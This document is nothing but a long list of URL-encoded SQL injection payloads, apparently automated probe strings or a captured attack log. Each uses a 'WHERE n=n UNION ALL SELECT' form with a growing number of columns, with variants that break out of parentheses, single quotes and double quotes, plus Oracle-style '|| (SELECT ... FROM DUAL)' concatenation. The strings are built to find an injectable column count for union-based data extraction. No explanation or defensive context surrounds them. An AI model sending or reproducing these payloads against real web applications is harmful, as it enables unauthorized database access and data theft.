-1996%29%20WHERE%209869%3D9869%20UNION%20ALL%20SELECT%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%2C%209869%23 -9024%29%20WHERE%203767%3D3767%20UNION%20ALL%20SELECT%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%2C%203767%23 -1600%29%20WHERE%209521%3D9521%20UNION%20ALL%20SELECT%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%23 -4557%29%20WHERE%208185%3D8185%20UNION%20ALL%20SELECT%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%2C%208185%23 -4895%29%20WHERE%206389%3D6389%20UNION%20ALL%20SELECT%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%2C%206389%23 -7707%29%20WHERE%208928%3D8928%20UNION%20ALL%20SELECT%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%2C%208928%23 -4050%29%20WHERE%203827%3D3827%20UNION%20ALL%20SELECT%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%2C%203827%23 -6721%29%20WHERE%207323%3D7323%20UNION%20ALL%20SELECT%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%2C%207323%23 -7313%29%20WHERE%206702%3D6702%20UNION%20ALL%20SELECT%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%2C%206702%23 -1174%27%29%20WHERE%202111%3D2111%20UNION%20ALL%20SELECT%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%2C%202111%23 -2025%27%29%20WHERE%201480%3D1480%20UNION%20ALL%20SELECT%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%2C%201480%23 -2241%27%29%20WHERE%208734%3D8734%20UNION%20ALL%20SELECT%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%23 -7854%27%29%20WHERE%206401%3D6401%20UNION%20ALL%20SELECT%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%2C%206401%23 -2605%27%29%20WHERE%204069%3D4069%20UNION%20ALL%20SELECT%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%23 -1724%27%29%20WHERE%202893%3D2893%20UNION%20ALL%20SELECT%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%23 -4933%27%29%20WHERE%205890%3D5890%20UNION%20ALL%20SELECT%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%2C%205890%23 -1633%27%29%20WHERE%209371%3D9371%20UNION%20ALL%20SELECT%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%2C%209371%23 -8646%27%29%20WHERE%206279%3D6279%20UNION%20ALL%20SELECT%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%23 -3832%27%29%20WHERE%209816%3D9816%20UNION%20ALL%20SELECT%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%23 -6471%27%20WHERE%209396%3D9396%20UNION%20ALL%20SELECT%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%2C%209396%23 -5955%27%20WHERE%206332%3D6332%20UNION%20ALL%20SELECT%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%2C%206332%23 -1603%27%20WHERE%204763%3D4763%20UNION%20ALL%20SELECT%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%2C%204763%23 -8688%27%20WHERE%209313%3D9313%20UNION%20ALL%20SELECT%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%23 -4291%27%20WHERE%209651%3D9651%20UNION%20ALL%20SELECT%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%23 -5854%27%20WHERE%207386%3D7386%20UNION%20ALL%20SELECT%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%23 -4740%27%20WHERE%206863%3D6863%20UNION%20ALL%20SELECT%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%2C%206863%23 -1617%27%20WHERE%201025%3D1025%20UNION%20ALL%20SELECT%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%2C%201025%23 -9022%27%20WHERE%201035%3D1035%20UNION%20ALL%20SELECT%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%2C%201035%23 -6355%27%20WHERE%209734%3D9734%20UNION%20ALL%20SELECT%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%23 -3417%22%20WHERE%207767%3D7767%20UNION%20ALL%20SELECT%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%2C%207767%23 -1433%22%20WHERE%207646%3D7646%20UNION%20ALL%20SELECT%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%2C%207646%23 -1947%22%20WHERE%203525%3D3525%20UNION%20ALL%20SELECT%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%23 -7140%22%20WHERE%203875%3D3875%20UNION%20ALL%20SELECT%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%23 -2342%22%20WHERE%209911%3D9911%20UNION%20ALL%20SELECT%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%2C%209911%23 -6177%22%20WHERE%201272%3D1272%20UNION%20ALL%20SELECT%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%2C%201272%23 -2760%22%20WHERE%209820%3D9820%20UNION%20ALL%20SELECT%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%2C%209820%23 -9461%22%20WHERE%202178%3D2178%20UNION%20ALL%20SELECT%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%2C%202178%23 -7928%22%20WHERE%204379%3D4379%20UNION%20ALL%20SELECT%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%23 -3990%22%20WHERE%208905%3D8905%20UNION%20ALL%20SELECT%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%2C%208905%23 -2700%27%20%7C%7C%20%28SELECT%207532%20FROM%20DUAL%20WHERE%203200%3D3200%20UNION%20ALL%20SELECT%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%2C%203200%23%20%29%20%7C%7C%20%27 -1050%27%20%7C%7C%20%28SELECT%209484%20FROM%20DUAL%20WHERE%209965%3D9965%20UNION%20ALL%20SELECT%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%23%20%29%20%7C%7C%20%27 -4639%27%20%7C%7C%20%28SELECT%209401%20FROM%20DUAL%20WHERE%204177%3D4177%20UNION%20ALL%20SELECT%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%2C%204177%23%20%29%20%7C%7C%20%27 -2280%27%20%7C%7C%20%28SELECT%201929%20FROM%20DUAL%20WHERE%205691%3D5691%20UNION%20ALL%20SELECT%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%2C%205691%23%20%29%20%7C%7C%20%27 -2888%27%20%7C%7C%20%28SELECT%206829%20FROM%20DUAL%20WHERE%206947%3D6947%20UNION%20ALL%20SELECT%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%2C%206947%23%20%29%20%7C%7C%20%27 -7287%27%20%7C%7C%20%28SELECT%202840%20FROM%20DUAL%20WHERE%209988%3D9988%20UNION%20ALL%20SELECT%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%2C%209988%23%20%29%20%7C%7C%20%27 -8225%27%20%7C%7C%20%28SELECT%202306%20FROM%20DUAL%20WHERE%202840%3D2840%20UNION%20ALL%20SELECT%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%23%20%29%20%7C%7C%20%27 -3123%27%20%7C%7C%20%28SELECT%203593%20FROM%20DUAL%20WHERE%206681%3D6681%20UNION%20ALL%20SELECT%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%2C%206681%23%20%29%20%7C%7C%20%27 -9359%27%20%7C%7C%20%28SELECT%201311%20FROM%20DUAL%20WHERE%205392%3D5392%20UNION%20ALL%20SELECT%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%2C%205392%23%20%29%20%7C%7C%20%27 -2445%27%20%7C%7C%20%28SELECT%208571%20FROM%20DUAL%20WHERE%201881%3D1881%20UNION%20ALL%20SELECT%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%2C%201881%23%20%29%20%7C%7C%20%27 -8729%27%20%7C%7C%20%28SELECT%202583%20WHERE%209908%3D9908%20UNION%20ALL%20SELECT%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%2C%209908%23%20%29%20%7C%7C%20%27 -9538%27%20%7C%7C%20%28SELECT%203448%20WHERE%205942%3D5942%20UNION%20ALL%20SELECT%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%23%20%29%20%7C%7C%20%27 -8338%27%20%7C%7C%20%28SELECT%207192%20WHERE%207910%3D7910%20UNION%20ALL%20SELECT%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%2C%207910%23%20%29%20%7C%7C%20%27 -6017%27%20%7C%7C%20%28SELECT%204097%20WHERE%205352%3D5352%20UNION%20ALL%20SELECT%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%2C%205352%23%20%29%20%7C%7C%20%27 -4492%27%20%7C%7C%20%28SELECT%206360%20WHERE%203997%3D3997%20UNION%20ALL%20SELECT%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%2C%203997%23%20%29%20%7C%7C%20%27 -7178%27%20%7C%7C%20%28SELECT%207877%20WHERE%202571%3D2571%20UNION%20ALL%20SELECT%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%23%20%29%20%7C%7C%20%27 -5906%27%20%7C%7C%20%28SELECT%207009%20WHERE%209467%3D9467%20UNION%20ALL%20SELECT%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%2C%209467%23%20%29%20%7C%7C%20%27 -8877%27%20%7C%7C%20%28SELECT%202854%20WHERE%208629%3D8629%20UNION%20ALL%20SELECT%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%2C%208629%23%20%29%20%7C%7C%20%27 